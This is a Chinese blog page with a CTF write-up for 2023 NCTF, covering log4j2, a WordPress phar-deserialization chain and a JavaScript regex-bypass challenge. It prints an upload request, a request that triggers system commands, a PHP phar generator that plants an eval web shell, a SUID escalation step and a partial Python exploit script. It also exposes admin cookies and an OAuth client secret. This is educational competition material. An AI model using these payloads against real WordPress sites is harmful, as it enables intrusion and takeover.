<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Drunkbaby">
    
    <title>
        
            2023 NCTF WP |
        
        Drunkbaby&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png">
    
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/font/css/brands.min.css">
    
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"drun1baby.github.io","root":"/","language":"zh-CN","path":"search.xml"}
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true},"style":{"primary_color":"#0066cc","logo":"https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/logo.png","favicon":"https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png","avatar":"https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png","font_size":"15px","font_family":null,"hover":{"shadow":true,"scale":true},"first_screen":{"enable":true,"header_transparent":true,"background_img":"/images/bg.svg","description":"且将新火试新茶，诗酒趁年华","font_color":null,"hitokoto":false},"scroll":{"progress_bar":true,"percent":false}},"local_search":{"enable":true,"preload":true},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":false},"comment":{"enable":true,"use":"valine","valine":{"enable":true,"appid":"9Ky0YY6Ij33nFC4KZ2VcGh9k-MdYXbMMI","appkey":"qqN77H4k2Hxhg7ZJ88Lf0xxM","placeholder":"just go go","server_urls":"https://9Ky0YY6I.api.lncldglobal.com","background":"/images/comment_bg.png","count":true},"gitalk":{"github_id":"Drun1baby","github_admins":null,"repository":"gitalk-restore","client_id":"e5b5e5c0ba918eb3d3c4","client_secret":"a0ac0e6f2078095bce9291f42acd13b67e059dff","proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.8"},"waline":{"server_url":null,"reaction":false,"version":2}},"post":{"author_label":{"enable":true,"auto":true,"custom_label_list":["Trainee","Engineer","Architect"]},"word_count":{"enable":true,"wordcount":true,"min2read":true},"img_align":"left","copyright_info":true},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"version":"3.7.3"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Drunkbaby's Blog" type="application/atom+xml">
</head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container border-box">

    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/logo.png">
                </a>
            
            <a class="site-name border-box" href="/">
               Drunkbaby&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">

                

                    <div class="fade-in-down-animation">
    <div class="post-page-container border-box">

        <div class="article-content-container border-box">

            <div class="article-title">
                <span class="title-hover-animation">2023 NCTF WP</span>
            </div>

            
                <div class="article-header border-box">
                    
                        <div class="avatar-box border-box">
                            <img src="https://raw.githubusercontent.com/Drun1baby/CVE_Pentest/main/%E5%8F%8B%E9%93%BEimages/favicon.png">
                        </div>
                    
                    <div class="info-box">
                        <div class="author">
                            <span class="name">Drunkbaby</span>
                            
                                <span class="author-label">Lv6</span>
                            
                        </div>
                        <div class="meta-info border-box">
                            

<div class="article-meta-info-container border-box post">
    <div class="article-meta-info border-box">
        


        
            <span class="meta-info-item article-create-date">
                <i class="icon fa-solid fa-calendar-check"></i>&nbsp;
                <span class="pc">2023-12-27 16:08:39</span>
                <span class="mobile">2023-12-27 16:08</span>
            </span>

            <span class="meta-info-item article-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="pc">2023-12-27 16:10:35</span>
            </span>
        

        
            <span class="meta-info-item article-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul>
                    
                            <li class="category-item">
                                
                                <a href="/categories/WP/">WP</a>
                            </li>
                        
                    
                </ul>
            </span>
        

        
            <span class="article-tag meta-info-item border-box">
                <i class="icon fas fa-tags"></i>&nbsp;
                <ul>
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/WP/">WP</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item article-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>2.1k 字</span>
            </span>
        
        
            <span class="meta-info-item article-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>9 分钟</span>
            </span>
        
        
            <span class="meta-info-item article-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content keep-markdown-body">
                

                <h1 id="2023-NCTF-WP"><a href="#2023-NCTF-WP" class="headerlink" title="2023 NCTF WP"></a>2023 NCTF WP</h1><h2 id="Logging"><a href="#Logging" class="headerlink" title="Logging"></a>Logging</h2><p>log4j2</p>
<p>和原本的区别是没有 Logger 一系列 api。但是用 Accept 头修改就可以</p>
<img src="/2023/12/27/2023-NCTF-WP/log4j.png" class>

<p>反弹 shell 拿 flag</p>
<img src="/2023/12/27/2023-NCTF-WP/flag1.png" class>

<h2 id="ez-wordpress"><a href="#ez-wordpress" class="headerlink" title="ez_wordpress"></a>ez_wordpress</h2><p>很 realworld 的一道题目，出的挺好的，就是一开始的思路没想到。然后踩了很多坑。</p>
<p>先用 wpscan 扫，做信息收集。</p>
<ul>
<li>Wordpress 版本是 6.4.1 有 POP 链漏洞。</li>
<li>all-in-one-video-gallery 插件版本是 2.6.4，有任意文件读取 &amp; SSRF 的洞。</li>
<li>contact-form-7 这里提供了文件上传的功能。Version: 5.8.4</li>
<li>drag-and-drop-multiple-file-upload-contact-form-7，Version：1.3.6.2；也是文件上传的点。</li>
</ul>
<p>这里的思路是很特别的，phar + SSRF，所以说这个题目真的很 RealWorld</p>
<p>通过任意文件上传，这里我们可以上传一个 phar 文件，由于 phar 协议对于后缀是无所谓的，所以这里上传 jpg 就可以了。</p>
<p>但是要构造这个 HTTP 请求需要自己起一个环境，然后配置 drag-and-drop-multiple-file-upload-contact-form-7 插件的文件上传。这个插件最后是在文章评论里面能够上传文件，出题人把 CSS 都删掉了， 导致只能自己起环境。</p>
<p>最终的文件上传的 HTTP 包</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/wp-admin/admin-ajax.php</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>120.27.148.152:8012</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>1100</span><br><span class="line"><span class="attribute">Pragma</span><span class="punctuation">: </span>no-cache</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>no-cache</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>application/json, text/javascript, */*; q=0.01</span><br><span class="line"><span class="attribute">X-Requested-With</span><span class="punctuation">: </span>XMLHttpRequest</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>multipart/form-data; boundary=----WebKitFormBoundary4iNAMw9WsXYpvRh5</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>http://192.168.155.130:8080</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>http://192.168.155.130:8080/2023/12/23/hello-world/</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ja;q=0.5,zh-TW;q=0.4,no;q=0.3,ko;q=0.2</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>wordpress_ac537363824161b6f57971b554f35150=admin%7C1703488989%7CPIzRFsjUUfT48tJQYugEtBeOXowW4dq5DGTK0htmzgp%7C1613ac86565afa28de016afa707f293446d531968efbbfe134f2c39f9116fd8c; wordpress_37b73f3997d8e86a5444f5e6169e62a9=admin%7C1703507590%7CphGpVzdrXMbZ1trfyuedAn43lTl3bm6e98CkwVCGBGU%7C84448144083da56f705baf56db136311c0121a1ac9f0f942cee38c9407ebd8f5; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_ac537363824161b6f57971b554f35150=admin%7C1703488989%7CPIzRFsjUUfT48tJQYugEtBeOXowW4dq5DGTK0htmzgp%7C8bbeecd37213bac95528f20b5a6714b63984d4caf8c83e032c3e2d3e6e08c931; aiovg_rand_seed=4191310244; wp_lang=zh_CN; wordpress_logged_in_37b73f3997d8e86a5444f5e6169e62a9=admin%7C1703507590%7CphGpVzdrXMbZ1trfyuedAn43lTl3bm6e98CkwVCGBGU%7C8d30bb0f69143395c98c0e2fde270c1236a715c34584cc2ab3755c7fc3bdf982; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1703334790</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"></span><br><span class="line"><span class="language-pgsql"><span class="comment">------WebKitFormBoundary4iNAMw9WsXYpvRh5</span></span></span><br><span class="line"><span class="language-pgsql">Content-Disposition: form-data; <span class="type">name</span>=&quot;size_limit&quot;</span></span><br><span class="line"><span class="language-pgsql"></span></span><br><span class="line"><span class="language-pgsql"><span class="number">15555555555</span></span></span><br><span class="line"><span class="language-pgsql"><span class="comment">------WebKitFormBoundary4iNAMw9WsXYpvRh5</span></span></span><br><span class="line"><span class="language-pgsql">Content-Disposition: form-data; <span class="type">name</span>=&quot;action&quot;</span></span><br><span class="line"><span class="language-pgsql"></span></span><br><span class="line"><span class="language-pgsql">dnd_codedropz_upload</span></span><br><span class="line"><span class="language-pgsql"><span class="comment">------WebKitFormBoundary4iNAMw9WsXYpvRh5</span></span></span><br><span class="line"><span class="language-pgsql">Content-Disposition: form-data; <span class="type">name</span>=&quot;type&quot;</span></span><br><span class="line"><span class="language-pgsql"></span></span><br><span class="line"><span class="language-pgsql">click</span></span><br><span class="line"><span class="language-pgsql"><span class="comment">------WebKitFormBoundary4iNAMw9WsXYpvRh5</span></span></span><br><span class="line"><span class="language-pgsql">Content-Disposition: form-data; <span class="type">name</span>=&quot;security&quot;</span></span><br><span class="line"><span class="language-pgsql"></span></span><br><span class="line"><span class="language-pgsql">a803333984</span></span><br><span class="line"><span class="language-pgsql"><span class="comment">------WebKitFormBoundary4iNAMw9WsXYpvRh5</span></span></span><br><span class="line"><span class="language-pgsql">Content-Disposition: form-data; <span class="type">name</span>=&quot;form_id&quot;</span></span><br><span class="line"><span class="language-pgsql"></span></span><br><span class="line"><span class="language-pgsql"><span class="number">18</span></span></span><br><span class="line"><span class="language-pgsql"><span class="comment">------WebKitFormBoundary4iNAMw9WsXYpvRh5</span></span></span><br><span class="line"><span class="language-pgsql">Content-Disposition: form-data; <span class="type">name</span>=&quot;upload_name&quot;</span></span><br><span class="line"><span class="language-pgsql"></span></span><br><span class="line"><span class="language-pgsql">upload-file<span class="number">-393</span></span></span><br><span class="line"><span class="language-pgsql"><span class="comment">------WebKitFormBoundary4iNAMw9WsXYpvRh5</span></span></span><br><span class="line"><span class="language-pgsql">Content-Disposition: form-data; <span class="type">name</span>=&quot;upload-file&quot;; filename=&quot;drunkbaby1.png&quot;</span></span><br><span class="line"><span class="language-pgsql">Content-<span class="keyword">Type</span>: image/png</span></span><br><span class="line"><span class="language-pgsql"></span></span><br><span class="line"><span class="language-pgsql">test</span></span><br><span class="line"><span class="language-pgsql"><span class="comment">------WebKitFormBoundary4iNAMw9WsXYpvRh5</span></span></span><br><span class="line"><span class="language-pgsql"></span></span><br><span class="line"><span class="language-pgsql"></span></span><br></pre></td></tr></table></figure>

<p>用 phar 伪协议去构造反序列化的 HTTP 请求如下</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/index.php/video?dl=cGhhcjovLy92YXIvd3d3L2h0bWwvd3AtY29udGVudC91cGxvYWRzL3dwX2RuZGNmN191cGxvYWRzL3dwY2Y3LWZpbGVzL2RydW5rYmFieTEucG5n&amp;a=system&amp;c=ls</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>120.27.148.152:8012</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ja;q=0.5,zh-TW;q=0.4,no;q=0.3,ko;q=0.2</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>aiovg_rand_seed=1541956646</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>构造 phar 的 EXP</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="title class_">class</span> <span class="title class_">WP_HTML_Token</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="title class_">public</span> $<span class="title class_">bookmark_name</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$on_destroy</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$bookmark_name</span>, <span class="variable">$on_destroy</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"><span class="variable language_">$this</span>-&gt;bookmark_name = <span class="variable">$bookmark_name</span>;</span><br><span class="line"><span class="variable language_">$this</span>-&gt;on_destroy = <span class="variable">$on_destroy</span>;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title class_">\WP_HTML_Token</span>(<span class="string">&#x27;echo \&#x27;&lt;?php @eval($_POST[&quot;nepnb&quot;]);?&gt;\&#x27; &gt; /var/www/html/nepnep.php&#x27;</span>, <span class="string">&#x27;system&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$phar</span> =<span class="keyword">new</span> <span class="title class_">Phar</span>(<span class="string">&quot;phar.phar&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">startBuffering</span>();</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setStub</span>(<span class="string">&quot;GIF89A&lt;?php XXX __HALT_COMPILER(); ?&gt;&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setMetadata</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">addFromString</span>(<span class="string">&quot;test.txt&quot;</span>, <span class="string">&quot;test&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">stopBuffering</span>();</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>最后不论是文件上传还是 phar 生成，都踩了不少坑。</p>
<p>最后连上 shell 之后需要 suid 提权</p>
<img src="/2023/12/27/2023-NCTF-WP/suid.png" class>

<p>date suid </p>
<p>date -f 文件名</p>
<img src="/2023/12/27/2023-NCTF-WP/flag2.png" class>
<h2 id="wait-what"><a href="#wait-what" class="headerlink" title="wait what"></a>wait what</h2><p>做的时候就感觉是某种特性，看到 in 的时候感觉问题挺大的</p>
<img src="/2023/12/27/2023-NCTF-WP/in.png" class>

<p>搜了一下相关的特性 <a class="link" target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Operators/in">https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Operators/in<i class="fas fa-external-link-alt"></i></a></p>
<blockquote>
<p>如果指定的属性在指定的对象或其原型链中，则 <strong><code>in</code></strong> <strong>运算符</strong>返回 <code>true</code>。</p>
</blockquote>
<p>本地测试一下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> banned_users = [<span class="string">&#x27;hacker&#x27;</span>]</span><br><span class="line"></span><br><span class="line">banned_users.<span class="title function_">push</span>(<span class="string">&quot;admin&quot;</span>)</span><br><span class="line"></span><br><span class="line">username=<span class="string">&#x27;admin&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> test2 = (username <span class="keyword">in</span> banned_users)</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`使用in关键字匹配<span class="subst">$&#123;username&#125;</span>的结果为：<span class="subst">$&#123;test2&#125;</span>`</span>)</span><br><span class="line">    <span class="keyword">if</span> (test2) &#123;</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;第二个判断匹配到封禁用户：&quot;</span>,username)</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>当 username &#x3D; ‘admin’ 时，返回 false，当 username &#x3D; ‘0’ 时，返回 true</p>
<p>由于 banned_users 为 Array 类型，不存在 admin 属性，因此 test2 实际上判断的是banned_users 中是否存在数组索引为 username 的值（由于对象的属性名称会被隐式转换为字符串，”0” 和 0 都可以作为数组索引）</p>
<p>这里过了第一步之后还有一步正则的过滤，比较明显的是 test 函数</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> test1 = banned_users_regex.<span class="title function_">test</span>(username)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>test() 方法用于检测一个字符串是否匹配某个模式.</p>
</blockquote>
<p>由于 <code>new RegExp(regex_string, &quot;g&quot;)</code> 定义了 g 的全局标志</p>
<p>如果正则表达式设置了全局标志， <code>test()</code> 的执⾏会改变正则表达式 lastIndex 属性。连续地执⾏ <code>test()</code> ⽅法，后续的执⾏将会从 lastIndex 处开始匹配字符串</p>
<ul>
<li>example</li>
</ul>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> &gt; <span class="keyword">let</span> r = <span class="regexp">/^admin$/g</span></span><br><span class="line"><span class="number">2</span></span><br><span class="line"><span class="number">3</span> &gt; r.<span class="property">lastIndex</span></span><br><span class="line"><span class="number">4</span> <span class="number">0</span></span><br><span class="line"><span class="number">5</span></span><br><span class="line"><span class="number">6</span> &gt; r.<span class="title function_">test</span>(<span class="string">&quot;admin&quot;</span>)</span><br><span class="line"><span class="number">7</span> <span class="literal">true</span></span><br><span class="line"><span class="number">8</span></span><br><span class="line"><span class="number">9</span> &gt; r.<span class="property">lastIndex</span></span><br><span class="line"><span class="number">10</span> <span class="number">5</span></span><br><span class="line"><span class="number">11</span></span><br><span class="line"><span class="number">12</span> r.<span class="title function_">test</span>(<span class="string">&quot;admin&quot;</span>)</span><br><span class="line"><span class="number">13</span> <span class="literal">false</span></span><br><span class="line"><span class="number">14</span></span><br><span class="line"><span class="number">15</span> &gt; r.<span class="property">lastIndex</span></span><br><span class="line"><span class="number">16</span> <span class="number">0</span></span><br></pre></td></tr></table></figure>

<p>那么这里的攻击思路是什么呢，总结一下应该是想办法让 admin 这个用户的 lastIndex 被我们恶意修改为 <code>admin.length</code>。攻击分为两步走</p>
<p>1、访问 <code>/api/ban_user</code> 路由，构造数组传入，绕过 <code>in</code> 的过滤<br>2、访问 <code>/api/flag</code>，发两次包，就能够让 <code>r.lastIndex</code> 变成 <code>admin.length</code>，绕过 waf</p>
<p>但是这里实施起来还是有个问题，下面这段代码每次在请求时都会创建⼀个新的 <code>banned_users_regex</code> ，恢复其 lastIndex 位置为初始值 0</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">use</span>(<span class="keyword">function</span> (<span class="params">req, res, next</span>) &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="title function_">build_banned_users_regex</span>()</span><br><span class="line">		<span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;封禁用户正则表达式（满足这个正则表达式的用户名为被封禁用户名）：&quot;</span>,banned_users_regex)</span><br><span class="line">    &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="title function_">next</span>()</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>这里的绕过挺巧妙的，又用到了一个特性</p>
<p>现如果传⼊ <code>escapeRegExp(string)</code> 函数中的 string 参数为⾮字符串类型，则 string 不存在 replace 属性，会抛出TypeError，如此来绕过 regex 的更新</p>
<p>如此一来，最后的 EXP 就是</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">remote_addr=<span class="string">&quot;http://127.0.0.1&quot;</span></span><br><span class="line"></span><br><span class="line">rs = requests.Session()</span><br><span class="line"></span><br><span class="line">resp = rs.post(remote_addr+<span class="string">&quot;/api/register&quot;</span>,json=</span><br><span class="line">&#123;<span class="string">&quot;username&quot;</span>:<span class="string">&quot;test&quot;</span>,<span class="string">&quot;password&quot;</span>:<span class="string">&quot;test&quot;</span>&#125;)</span><br><span class="line"><span class="built_in">print</span>(resp.text)</span><br><span class="line"></span><br><span class="line">resp = rs.post(remote_addr+<span class="string">&quot;/api/ban_user&quot;</span>,json=</span><br><span class="line">&#123;<span class="string">&quot;username&quot;</span>:<span class="string">&quot;test&quot;</span>,<span class="string">&quot;password&quot;</span>:<span class="string">&quot;test&quot;</span>,<span class="string">&quot;ban_username&quot;</span>:&#123;<span class="string">&quot;toString&quot;</span>:<span class="string">&quot;&quot;</span>&#125;&#125;)</span><br><span class="line"><span class="built_in">print</span>(resp.text)</span><br><span class="line"></span><br><span class="line">resp = rs.post(remote_addr+<span class="string">&quot;/api/flag&quot;</span>,json=</span><br><span class="line">&#123;<span class="string">&quot;username&quot;</span>:<span class="string">&quot;admin&quot;</span>,<span class="string">&quot;password&quot;</span>:<span 